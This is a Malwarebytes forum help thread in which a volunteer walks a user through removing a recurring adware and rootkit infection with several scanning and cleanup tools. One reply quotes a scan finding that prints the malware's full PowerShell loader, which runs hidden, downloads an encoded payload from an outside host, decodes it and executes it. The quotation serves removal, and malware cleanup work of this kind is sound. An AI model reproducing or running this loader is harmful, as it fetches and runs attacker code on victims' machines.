Jump to content

Suspected Rootkit/Malware generator on PC, via Powershell


Recommended Posts

Hey guys. I came to the Malwarebytes forums to try and solve this reoccurring issue I've been having with my Windows 10 Samsung laptop since about last August. To start, I never had any malware/adware problems period on my PC until said August when I had been trying to download a school-related pdf textbook from a suspicious website via a Google search. To sum it up, on that August day I downloaded a fake pdf .iso file that put some sort of ransomware on my PC that locked me out of my desktop when I opened it. Stupid on my part, yes, I know. I made a desperate decision due to a textbook emergency which I regretted instantly.  Anyhow, I managed to boot into Windows without explorer.exe so I could run Task Manager and subsequently Malwarebytes to get rid of the viruses, and after a day of work it seemed to be running decently again and I breathed a sigh of relief. I then went to my local Microsoft store and a tech guy ran Hitman Pro which found more crap on there which was removed. However, ever since then I have been getting monthly or so adware/malware viruses picked up by Malwarebytes/AdwCleaner that are removed, but they always seem to re-occur in the next few weeks or so. I don't do anything suspicious to get them or download any random suspicious files (that pdf debacle was a very rare occurrence for me), which had me confused as to where these things were coming from. As of this month I had gotten more of this stuff and I began to suspect a rootkit or something was on my PC that was generating the malware (I had suspected this in the months prior to March as well). Upon scanning with Malwarebytes I could quarantine the viruses found, but not remove them. It would replace them upon PC restart and I also encountered a strange Windows temporary profile bug upon restart too, meaning I was locked out of my programs/files. This bug seemed to go away on its own. At this time I also downloaded Avast upon a referral from a family member and noticed that it was giving me warnings about a Win32:Rootkit-gen and a Win32:Malware-gen infection. It seemed like I finally found what the issue was, except I can't get rid of it.

To put it simply, my issue is basically the same issue this person has that posted in this forum today. It is almost word-for-word exactly the same issue I have. 

I have the same powershell taskbar icon pop up, and it happens upon every time I take my computer out of sleep mode. I even got a photo of the Avast notification that popped up again when I was (ironically) typing this post. So to put it short, I think this is my issue but apparently it's a complex problem as none of my virus programs detect it or can get rid of it. Can it be solved or do I have to resort to a full hard drive wipe (if that even will work)? If you need any other information just ask; help would be very appreciated, thank you.

AvastMalwareNotification.jpg

Link to post
Share on other sites

Hello amd888 and welcome to Malwarebytes,

My screen name is kevinf80, i`m here to help clean up your system. Make sure to run all scans from accounts with Administrator status, continue as follows please:

Anyone other than the original starter of this thread please DO NOT follow the instructions and advice posted as replies here, my help and advice is NOT related to your system and will probably cause more harm than good...

Change the download folder setting in the Default Browser only. so all of the tools we may use are saved to the Desktop:

user posted imageGoogle Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser. user posted image
Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.

user posted imageMozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. user posted image Choose Options. In the downloads section, click the Browse button, click on the Desktop folder and the click the "Select Folder" button. Click OK to get out of the Options menu.

user posted imageInternet Explorer - Click the Tools menu in the upper right-corner of the browser. user posted image Select View downloads. Select the Options link in the lower left of the window. Click Browse and select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.

user posted imageChange default download folder location in Edge -Boot to a user account with admin status, select start > file explorer > right click on "Downloads" folder and select "Properties"

In the new window select "Location" tab > clear the text field box and type in or copy/paste %userprofile%\Desktop > select "Apply" then "OK"

Be aware you are not changing the Browser download folder location, you are changing the user’s download directory location.....

Next,

Follow the instructions in the following link to show hidden files:

http://www.howtogeek.com/howto/windows-vista/show-hidden-files-and-folders-in-windows-vista/

Next,

Download Farbar Recovery Scan Tool and save it to your desktop.

Alternative download option: http://www.techspot.com/downloads/6731-farbar-recovery-scan-tool.html

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your security alerts to FRST either, accept the alert or turn your security off to allow FRST to run. It is not malicious or infected in any way...

Be aware FRST must be run from an account with Administrator status...
 

  • Double-click to run it. When the tool opens click Yes to disclaimer.(Windows 8/10 users will be prompted about Windows SmartScreen protection - click More information and Run.)
  • Make sure Addition.txt is checkmarked under "Optional scans"
  • Press Scan button to run the tool....
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The tool will also make a log named (Addition.txt) Please attach that log to your reply.



Next,

Download and save RogueKiller to your Desktop from this link:

https://www.fosshub.com/RogueKiller.html/setup.exe

Right click setup.exe and select Run as Administrator to start installing RogueKiller.

At the next window Checkmark "Install 32 and 64 bit versions, then select "Next"

user posted image

In the next window skip Licence I.D. and Licence Key, select "Next"

user posted image

In the next window make no changes and select "Next"

user posted image

In the next window leave both "Additional Shortcuts" checkmarked, then select "Next"

user posted image

In the next window make no changes and select "Install"

user posted image

RogueKiller will extract and complete installation, in the new window leave "Launch Roguekiller" checkmarked, then select finish.

user posted image

RogueKiller will launch. Accept UAC, then read and accept "User Agreements"

user posted image

In the new window the "Home" tab should already be selected, Change by selecting "Scan" tab, then select "Start Scan"

user posted image

When the scan completes select "Open Report"

user posted image

In the new Window select "Export text" name that file RK.txt, save to your Desktop and attach to your reply

user posted image

Let me see those logs...

Thank you,

Kevin..

Link to post
Share on other sites

Thank you for your assistance. I ran the two programs you asked for and have the three logs you also asked for. RogueKiller detected numerous problems on my PC; is it safe to go ahead and remove all of them at this time? In addition, I had backed up my data on an external hard drive numerous times since the August problem origin, so is that hard drive infected too? If so, how do I go about removing it from that hard drive? It has no operating system on it.

FRST.txt

Addition.txt

RK.txt

Link to post
Share on other sites

Thanks for those logs amd888, continue with the following:

Right click on RogueKiller.exe and select "Run as Administrator" to start the tool, accept UAC..

In the new window the "Home" tab should already be selected, Change by selecting "Scan" tab, then select "Start Scan"

user posted image

When the scan completes Checkmark (tick) the following against Registry entries, ensure that all other entries are not Checkmarked

[PUM.Proxy] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\NlaSvc\Parameters\Internet\ManualProxies | (default) : -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3608033313-1376809995-3719013177-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://samsung13.msn.com -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3608033313-1376809995-3719013177-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://samsung13.msn.com -> Found


Checkmark (tick) the following against Tasks[b/b] entries, ensure that all other entries are not Checkmarked

[Adw.SystemHealer] \{0A7D0B47-090A-0C0C-0A11-0C090A7F1104} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand ; ; ;     $ E r r o r A c t i o n P r e f e r e n c e = " s t o p " ; $ s c = " S i l e n t l y C o n t i n u e " ; $ W a r n i n g P r e f e r e n c e = $ s c ; $ P r o g r e s s P r e f e r e n c e = $ s c ; $ V e r b o s e P r e f e r e n c e = $ s c ; $ D e b u g P r e f e r e n c e = $ s c ; 
 f u n c t i o n   D K B P U Y K _ M C S O A ( $ p ) { $ n = " W i n d o w P o s i t i o n " ; t r y { N e w - I t e m   - P a t h   $ p | O u t - N u l l ; } c a t c h { ; } t r y { N e w - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - P r o p e r t y T y p e   D W O R D   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; 
 } 
 c a t c h { t r y { S e t - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } c a t c h { } 
 } } D K B P U Y K _ M C S O A ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ W i n d o w s P o w e r S h e l l _ v 1 . 0 _ p o w e r s h e l l . e x e " ) ; D K B P U Y K _ M C S O A ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ s v c h o s t . e x e " ) ; D K B P U Y K _ M C S O A ( " H K C U : \ C o n s o l e \ t a s k e n g . e x e " ) ; 
 $ s u r l = " h t t p : / / f o r a l l s h o p . i n f o / u / ? a = Y u j q 9 z E D 8 C Z A f E m T 1 z 8 I E i F G m c I I N D g I n c - B k - T R J 1 X a 5 r M o 8 G y 3 W O 2 i u r Y z W H 4 a T 8 G g r X 4 J x y z M S t 0 9 a d B 0 _ X k J W j z I K - k G e Y K d c 7 M i g H x g K 1 4 v l z M K e n F c o F S O K L J H t S L b X W E r U d - C 2 6 t z l G H W D e 5 t 2 t h _ v j d h v X _ 8 x E B f v f a t I Z g w 1 _ B P Z j O e m c 7 M Z Z h V E 0 R 7 d X 9 o o c P k P G s V k w B w 5 9 P 1 i 2 c E a f 2 u v H D k E N o L 5 o V C M z B s t 6 3 f C n 3 2 n 3 X m 4 z p O y P I f f p V v o h q 8 T e K Z O - B S L 2 1 z X - z o W u o I w X c T J T C J h S u g 8 F X Q 0 7 t 9 M V m 2 r l U r G E H L w m v U K I y G 2 g 3 B U Y o Q 7 l K - - N b t Z T v z P x x - p U d 7 - u o J v X m O k V 7 j 8 Y K 9 w N C R s B f K D R K 5 A l L n g a Q 6 9 X P 4 R X T O M 5 A p d r b w W C r X u 6 r 3 j c Q s c p b i Q c g c S 1 T q G m a t Z U v 6 R S 0 2 P I z D h 8 j _ v L T 0 z m a B Z J 4 u v v t o 3 M e M O w 8 y 8 8 h A V Q _ 1 U K E 3 U A O V Z l 3 5 h e d E G W t g o 3 a D v W W m k 2 t k M h j i 7 x 8 2 4 2 p Q b t l J G f W 2 m 5 Q A _ W C D l 4 x 6 t S j d m 6 b I p _ w 5 j S J i r f w u G 2 f _ r l b 5 B e 5 e 7 v K c 6 Z K E R 7 e x 1 o R Z i Q G s f 4 y 5 8 J R 1 C n Z B d l l g K g a C f w 4 n 6 R Y S O k o 9 C 2 Y 0 L Y B T y K f W I F _ q a 6 W u p _ x t Y b K K s P O b Q d - 7 3 U m X I 0 7 y R T q e A - U A p d k A o L e V m - K p r e _ w X q N 5 2 b b e z W 4 P l O L m r p q J T q 5 F 1 t 0 P D k k i m g 9 n 1 b g s 4 h r P - A p K q E Y y e 1 Q m e z Y 0 Q d 8 B p g _ x X r d t M 3 5 z k A p o c K c L N R a K H x W r Y 7 _ x m A Y J V K P i 7 o T w b 9 A H x J K e s 2 x H l J v T Z i E P 8 V 0 z n R 7 V J m M R a w c B D h j N g o u - 3 A I W E P H X w J X D E E c L 8 d B U 4 M e m 8 i P r z A i W B Z r U u G W e f G X _ p 2 D r f X F 1 e F J h U M 1 r N c 2 V R k e Y N a X t m i q D v M G Z 5 v F J - C K F n X P g 7 g q m D k g u Q v J o O o Y f w 2 I Q E R L e i y A 8 y h s w f d X M Q _ Z d k 7 M n L R O m z T s X o J Q s 6 L a a X 6 J M t v A L Y N j d T u S D 0 k T s s 5 m B D L v B v i L S g k c V G e A - 1 l M U & c = C f B O X S V Z X q M d 4 S w Y - D 4 a m c L H z h R v M X 3 9 4 r 2 3 0 M g u D 6 0 S 7 _ T I P s X T 2 j I 2 a Y c 3 w P j 5 h m H u Q a D m s P 7 B H k 7 0 f A J m I C Y 1 e V A 2 A w t q h H K C l a p U L 9 T Y 2 - m 5 9 Q a 2 V k Z Z i D 6 p 6 I X v 6 4 A D Y 9 7 1 K W l a t d V B 1 2 o g f V d q Y Y - C I b 0 s b g Y 7 O J o a y X g e f d 4 v H Y r k 9 l l 8 f 0 k 7 3 F M t D 7 u J w M a 2 j c l i 6 R - W E O R 0 D b V Q 4 4 y l 7 M Q i e - h Z N w Y r u Q x 2 a f x b q a l _ f u U t R a n d 5 w b D R d b o b 3 U n V L t e H n g _ O U M H 5 Y s n N z 8 o d N t Y c t v u g 8 N a O 1 I e M p U C t f J r G y S U V e 7 r i i K a q H 6 A S c u s b x Z _ I s h o B C k x Y O c l - U 9 C L 5 f - b L K Y W L j _ S w q 8 0 q K p 8 R D J N V I c C y - H b e U I X y E d J 8 1 1 S C H U - 5 _ A n 3 g a i 0 6 K i Y r m 5 T y L w q V V V - i 8 r S d Q d Q f l a q h X p p J T u 8 7 h f C Y Z r 1 W N a p o u C g v l d 1 C y R z X 4 s P A 2 4 e o O W 6 Q C W Z S w F 4 w v H 1 u o 0 0 8 k k F O F m X 5 L y 8 i F R - 3 H d Q 1 a Z 7 b G 0 Y e 2 f b f 6 e O s N K c a b A o 6 Q L O i M q 5 G O p l e D d g I x N 1 b J 5 S W i T K M 8 g 1 u w Y t f l C g 6 f 6 K 7 w n p 8 s R H 1 i a t Y A j D V F O j b i n B 8 r H j A T N j o 9 7 a S t l G G 4 U R P 0 1 _ o 1 Y S C H O K w k O G c O Z 5 S 5 Y M s A _ 3 o W p C A H R k 3 u K 9 H F w m w G I H B _ 5 q X r C F q O w A M I f i T l p M V B n l a l D 8 3 S q n z L p z _ O 4 a y J F j g 2 R H V x C z d V J f v U v p a G S 1 j v j Z s X 6 4 v m I m v d w W R D X 1 e g f R 1 Q c A Y V t a w 2 n 3 w f c t M C p T 4 1 S c 8 x S - W i N P Y i t b A h 6 B G 4 G L y Q a K K p s l o Z 0 0 w z v D H P s H 5 y i W h H R s h U g r q 0 9 J Z A G T Z Q i 0 B C z q M 6 k Q E X 4 e c W g I o 7 6 z e H 3 _ M I O C 7 z k i q n h k Y Y R e P l p E i q s 6 6 s T F M U z n I j g M - 8 - B V & r = 5 7 1 8 5 8 1 7 3 6 4 7 6 3 2 6 8 5 1 " ; $ s t s k = " { 0 A 7 D 0 B 4 7 - 0 9 0 A - 0 C 0 C - 0 A 1 1 - 0 C 0 9 0 A 7 F 1 1 0 4 } " ; $ p r i d = " S y s t e m H e a l e r " ; $ i n i d = " Q M L L N T R V " ; t r y { i f ( $ P S V e r s i o n T a b l e . P S V e r s i o n . M a j o r   - l t   2 ) { b r e a k ; ; } $ v = [ S y s t e m . E n v i r o n m e n t ] : : O S V e r s i o n . V e r s i o n ; 
 i f ( $ v . M a j o r   - e q   5 ) { i f ( ( $ v . M i n o r   - l t   2 )   - A N D   ( ( G e t - W m i O b j e c t   W i n 3 2 _ O p e r a t i n g S y s t e m ) . S e r v i c e P a c k M a j o r V e r s i o n   - l t   2 ) ) { b r e a k ; ; } } 
 i f ( - N O T   ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l ] [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) ) . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t I n R o l e ]   " A d m i n i s t r a t o r " ) ) { b r e a k ; 
 } 
 f u n c t i o n   K T X B ( $ u r l ) { $ r q = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ r q . U s e D e f a u l t C r e d e n t i a l s = $ t r u e ; $ r q . H e a d e r s . A d d ( " u s e r - a g e n t " , " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ; ) " ) ; r e t u r n   [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( $ r q . D o w n l o a d D a t a ( $ u r l ) ) ; ; } 
 f u n c t i o n   W R D Z Z B R J S B C ( $ r a w d a t a ) { $ b t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r a w d a t a ) ; $ e x t = $ b t [ 0 ] ; $ k e y = $ b t [ 1 ]   - b x o r   1 7 0 ; f o r ( $ i = 2 ; $ i   - l t   $ b t . L e n g t h ; $ i + + ) { $ b t [ $ i ] = ( $ b t [ $ i ]   - b x o r   ( ( $ k e y   +   $ i )   - b a n d   2 5 5 ) ) ; ; } 
 r e t u r n ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . D e f l a t e S t r e a m ( ( N e w - O b j e c t   I O . M e m o r y S t r e a m ( $ b t , 2 , ( $ b t . L e n g t h - $ e x t ) ) ) , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; ; } 
 $ s c = W R D Z Z B R J S B C ( K T X B ( $ s u r l ) ) ; I n v o k e - E x p r e s s i o n   - c o m m a n d   " $ s c " ; } c a t c h { } ; e x i t   0 ; ) -> Found
[Suspicious.Path|Tr.Gen1] \{A3FA95B3-1451-2218-A630-40E8F565B6B1} -- C:\ProgramData\{8DFDE3A7-3A56-540C-8847-B5D1621D12B7}\51CC23CB-E667-9460-9DA5-95C8229FDEB5.exe (/run) -> Found


Checkmark (tick) the following against File entries, ensure that all other entries are not Checkmarked

[Adw.DNSUnlocker][File] C:\Program Files (x86)\Steam\depotcache\223851_1463440244266315419.manifest -> Found
[Adw.DNSUnlocker][File] C:\Program Files (x86)\Steam\depotcache\223851_5648498717833789511.manifest -> Found


Checkmark (tick) the following against Web Browser entries, ensure that all other entries are not Checkmarked

[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://news.google.com/nwshp?hl=en&tab=wn&ei=XtliUsa-Is_4rAGXyYA4&ved=0CAsQqS4oBQ] -> Found
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : session.startup_urls [https://news.google.com/nwshp?hl=en&tab=wn&ei=XtliUsa-Is_4rAGXyYA4&ved=0CAsQqS4oBQ] -> Found


Hit the Delete button, when complete select "Open Report" in the next window select "Export txt" the log will open. Save to your Desktop for reference, also attach to next reply.
 
Next,
 

Open Malwarebytes, select > "settings" > "protection tab"

Scroll down to "Scan Options" ensure Scan for Rootkits and Scan within Archives are both on....

Go back to "DashBoard" select the Blue "Scan Now" tab......

When the scan completes deal with any found entries... Then select "Export Summary" then "Text File (*.txt)" name that log and save , you can copy or attach that to your reply...

Next,

Download AdwCleaner by Xplode onto your Desktop.
 
  • Double click on Adwcleaner.exe to run the tool.
Click on the Scan in the Actions box Please wait fot the scan to finish.. When "Waiting for action.Please uncheck elements you want to keep" shows in top line.. Click on the Cleaning box. Next click OK on the "Closing Programs" pop up box. Click OK on the Information box & again OK to allow the necessary reboot After restart the AdwCleaner(C*)-Notepad log will appear, please copy/paste it in your next reply. Where * is the number relative to list of scans completed...

Next,

Run FRST one more time, ensure all boxes are checkmarked under "Whitelist" but only Addition.txt under "Optional scan" Select scan, when done post the new logs. "FRST.txt" and "Addition.txt"

Let me see those logs in your reply, also tell me if you have are any remaining issues or concerns....

Thank you,

Kevin..
Link to post
Share on other sites

All right, I have followed these instructions too and have the 5 logs you asked for. Malwarebytes and AdwCleaner found nothing upon my scans as you asked. Is my PC clean again? I noticed 2 Internet Explorer entries found by RogueKiller were replaced upon the removal process. Otherwise the PC seems okay; time will tell if any issues come back. My only other question is about my external hard drive, as mentioned before. How should I ensure the viruses on this PC are not on that drive? I had backed up my whole PC in the past few months onto that drive with (supposedly) the virus here still on my PC then. What do you recommend I do? I don't want that drive infected and it to infect my PC again.

Addition.txt

AdwCleaner[S22].txt

FRST.txt

MBAMLog.txt

RK2.txt

Link to post
Share on other sites

Thanks for the update, yes your logs look good but I need confirmation that the PoweShell issue has cleared.. Regarding the external drive, install the following program to protect your system from infection via USB devices:

McShield - http://www.mcshield.net/ to protect your system from potential malware/infection when plugging in USB devices..

When that is complete connect your external drive, then run the following;

Download Sophos Free Virus Removal Tool and save it to your desktop.

If your security alerts to this scan either accept the alert or turn off your security to allow Sophos to run and complete.....

Please Do Not use your PC whilst the scan is in progress.... This scan is very thorough so may take several hours...
 
  • Double click the icon and select Run
  • Click Next
  • Select I accept the terms in this license agreement, then click Next twice
  • Click Install
  • Click Finish to launch the program
  • Once the virus database has been updated click Start Scanning
  • If any threats are found click Details, then View log file... (bottom left hand corner)
  • Copy and paste the results in your reply
  • Close the Notepad document, close the Threat Details screen, then click Start cleanup
  • Click Exit to close the program
  • If no threats were found please confirm that result....



The Virus Removal Tool scans the following areas of your computer:
  • Memory, including system memory on 32-bit (x86) versions of Windows
  • The Windows registry
  • All local hard drives, fixed and removable
  • Mapped network drives are not scanned.


Note: If threats are found in the computer memory, the scan stops. This is because further scanning could enable the threat to spread. You will be asked to click Start Cleanup to remove the threats before continuing the scan.

 

Thank you,

Kevin

 

Link to post
Share on other sites

Okay, I followed these steps as well and McShield and Sophos did not find any threats on my PC. I ran Sophos with my external hard drive plugged in. McShield detected it and said no malware was found on the drive, too. Does that mean I can deem my external hard drive safe to use? As for the Powershell issue, I tested by putting my PC into sleep mode and upon wake up, it did not run that process so it seems good. I don't know how else to test to see if that virus is completely gone.

What programs do I need to keep that I installed here with your help? Should I keep all of them? Is there anything else I need to do or know? Thank you for the continued help.

Link to post
Share on other sites

Thanks for the update amd888, yes your system should be good to go. Regarding programs to keep... Definitely keep McShield, keep RogueKiller and Sophos as stand alone scanners if you are ok with their use... FRST and AdwCleaner update at source so should only be downloaded when needed....

To clean up use the following:

Uninstall Sophos AV http://www.askvg.com/how-to-completely-uninstall-remove-a-software-program-in-windows-without-using-3rd-party-software/

Next,

Download "Delfix by Xplode" and save it to your desktop.

Or use the following if first link is down:

"Delfix link mirror"

If your security program alerts to Delfix either, accept the alert or turn your security off.

Double Click to start the program. If you are using Vista or higher, please right-click and choose run as administrator

Make Sure the following items are checked:

 
  • Remove disinfection tools <----- this will remove tools we have used.
  • Purge System Restore <--- this will remove all previous and possibly exploited restore points, a new point relative to system status at present will be created.
  • Reset system settings <--- this will reset any system settings back to default that were changed either by us during cleansing or malware/infection


Now click on "Run" and wait patiently until the tool has completed.

The tool will create a log when it has completed. We don't need you to post this.

Any remnant files/logs from tools we have used can be deleted…

Next,

Read the following links to fully understand PC Security and Best Practices, you may find them useful....

Answers to Common Security Questions and best Practices

Do I need a Registry Cleaner?

Take care and surf safe

Kevin... user posted image

 

Link to post
Share on other sites

OK, did the last steps you stated above. Thanks a lot for your help. I'll be sure to stay safer on the internet and when using computers so this doesn't occur again. If I ever need any help in the future with anything, I'll remember you guys.

Link to post
Share on other sites

  • Root Admin

Glad we could help. :)If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.